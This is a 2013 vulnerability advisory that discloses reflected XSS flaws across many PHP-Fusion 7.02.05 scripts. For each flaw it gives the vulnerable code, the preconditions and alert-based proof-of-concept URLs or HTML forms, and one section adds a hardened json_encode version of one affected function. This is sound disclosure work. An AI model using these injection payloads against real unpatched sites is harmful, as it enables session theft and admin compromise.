
Monday, May 27, 2013

PHP-Fusion 7.02.05 XSS


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.


http://www.php-fusion.co.uk/news.php

http://sourceforge.net/projects/php-fusion/



Version 7.02.05 is vulnerable, and possibly older versions as well.


The new, patched version 7.02.06 is available here:


http://www.php-fusion.co.uk/news.php?readmore=569

http://www.php-fusion.co.uk/downloads.ph...oad_id=264


Reflected XSS in "forum/viewthread.php"

Reason: insufficient sanitization of HTML output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread

PHP script "forum/viewthread.php" line 361:


Code:
// highlight jQuery plugin
if (isset($_GET['highlight'])) {
    $words = explode(" ", urldecode($_GET['highlight']));
    $higlight = ""; $i = 1; $c_words = count($words);
    // each word is wrapped in single quotes without any escaping and later emitted into inline JavaScript
    foreach ($words as $hlight) {
        $higlight .= "'".$hlight."'";
        $higlight .= ($i < $c_words ? "," : "");
        $i++;
    }
    add_to_head("<script type='text/javascript' src='".INCLUDES."jquery/jquery.highlight.js'></script>");
    $highlight_js .= "jQuery('.search_result').highlight([".$higlight."],{wordsOnly:true});";
Test (parameter "thread_id" must be valid):

http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*
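The word-list builder above, reproduced beside a hardened version, as an added example that is not PHP-Fusion's own code. The function names and the sample input are constructed for this illustration; the hardened form swaps the hand-built quoted list for json_encode() with the JSON_HEX_* flags.

```php
<?php
// Added example, not PHP-Fusion's own code: the word-list builder from
// forum/viewthread.php 7.02.05 reproduced beside a hardened version.

// Vulnerable form. Each word is wrapped in single quotes with no escaping,
// so a quote inside a word terminates the JS string and the array literal,
// and the redundant urldecode() lets a double-encoded %2527 arrive as a quote.
function build_highlight_vulnerable(string $highlight): string
{
    $words = explode(" ", urldecode($highlight));
    $list = "";
    $i = 1;
    $c_words = count($words);
    foreach ($words as $word) {
        $list .= "'" . $word . "'" . ($i < $c_words ? "," : "");
        $i++;
    }
    return "jQuery('.search_result').highlight([" . $list . "],{wordsOnly:true});";
}

// Hardened form. PHP has already decoded $_GET once, so no second urldecode().
// json_encode() emits a valid JS array literal, and the JSON_HEX_* flags turn
// quotes, angle brackets and ampersands into \uXXXX escapes, so the result can
// never close the string, the array or the surrounding <script> element.
function build_highlight_safe(string $highlight): string
{
    // drop empty words produced by repeated spaces and re-index so json_encode()
    // produces a JS array rather than an object
    $words = array_values(array_filter(explode(" ", $highlight), 'strlen'));
    $list = json_encode($words, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return "jQuery('.search_result').highlight(" . $list . ",{wordsOnly:true});";
}

// Constructed input: two search words, the second carrying a quote and a tag.
// The vulnerable builder copies the quote and the closing tag straight into the
// script; the hardened builder emits only \u0027 and \u003C-style escapes.
$input = "foo bar'</script>";
echo build_highlight_vulnerable($input), "\n";
echo build_highlight_safe($input), "\n";
```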

Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of HTML output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on

PHP script "messages.php" line 482:
Code:
if ($_GET['msg_send'] == "0") {
    echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
Test:
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/messages.php?msg_send=0" method="post">
<input type="hidden" name="chk_sendtoall" value="0">
<input type="hidden" name="user_list" value="</select><script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
A similar problem exists with the variable "$user_types"; in this case admin
access level is needed:

PHP script "messages.php" line 490:
Code:
if (iADMIN && !isset($_GET['msg_id'])) {
    echo "<label><input name='chk_sendtoall' type='checkbox' ".$sendtoall_chk." />\n";
    echo "".$locale['434'].":</label> <select name='msg_to_group' class='textbox'>\n".$user_types."</select>\n";

Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of HTML output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on

PHP script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Code:
if (isset($message) && $message != "") {
    echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n";
}
Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+

Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of HTML output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on

PHP script "administration/news.php" line 31:
Code:
if (isset($_GET['error']) && isnum($_GET['error'])) {
    if ($_GET['error'] == 1) {
        $message = $locale['413'];
...
    if ($message) {
        echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n";
    }
}
if (isset($_GET['status'])) {
    if ($_GET['status'] == "sn") {
        $message = $locale['410'];
...
    if ($message) {
        echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n";
    }
}
Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8&error=9&message=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8&status=1&message=<body+onload=alert(123);+

Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of HTML output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on

PHP script "administration/panel_editor.php" line 32:
Code:
while ($folder = readdir($temp)) {
    if (!in_array($folder, array(".","..")) && strstr($folder, "_panel")) {
        if (is_dir(INFUSIONS.$folder)) $panel_list[] = $folder;
    }
}
...
for ($i=0;$i < count($panel_list);$i++) {
        echo "<option".($panel_filename == $panel_list[$i] ?
            " selected='selected'" : "").">".$panel_list[$i]."</option>\n";
Test (parameter "aid" needs to be valid):
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/panel_editor.php?aid=e017e24eb00e8ccf" method="post">
<input type="hidden" name="panel_list[]" value="<script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of HTML output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges

PHP script "administration/phpinfo.php" line 46:
Code:
$phpinfo .= "<tr>\n<td class='tbl2' style='width:20%'>".$locale['410']."</td>
<td class='tbl1' style='text-align:right'>".$_SERVER['HTTP_USER_AGENT']."</td></tr>\n";

Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of HTML output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on

PHP script "administration/bbcodes.php" line 141:
Code:
echo "<td class='$cls'>".$__BBCODE__[0]['description']."</td>\n";
echo "<td class='$cls'>".$__BBCODE__[0]['usage']."</td>\n";

Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042&__BBCODE__[0][description]=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042&__BBCODE__[0][usage]=<body+onload=alert(123);+

Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of HTML output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on

PHP script "administration/article_cats.php" line 110:
Code:
if (isset($error) && isnum($error)) {
    if ($error == 1) {
        $errorMessage = $locale['460'];
    } elseif ($error == 2) {
        $errorMessage = $locale['461'];
    }
    if ($errorMessage) {
        echo "<div id='close-message'><div class='admin-message'>".$errorMessage."</div></div>\n";
    }

The same vulnerability exists in four different admin scripts:

1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php

Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/article_cats.php?aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/download_cats.php?aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news_cats.php?aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/weblink_cats.php?aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of HTML output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges

PHP script "administration/articles.php" line 70:
Code:
$bodypreview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body']));
$body2preview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body2']));
...
echo $bodypreview."\n";
...
echo $body2preview."\n";
Test (parameter "aid" needs to be valid):

Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/articles.php?aid=0ebd6f54040890e8" method="post">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="body" value="<script>alert(123);</script>">
<input type="hidden" name="body2" value="<script>alert(321);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
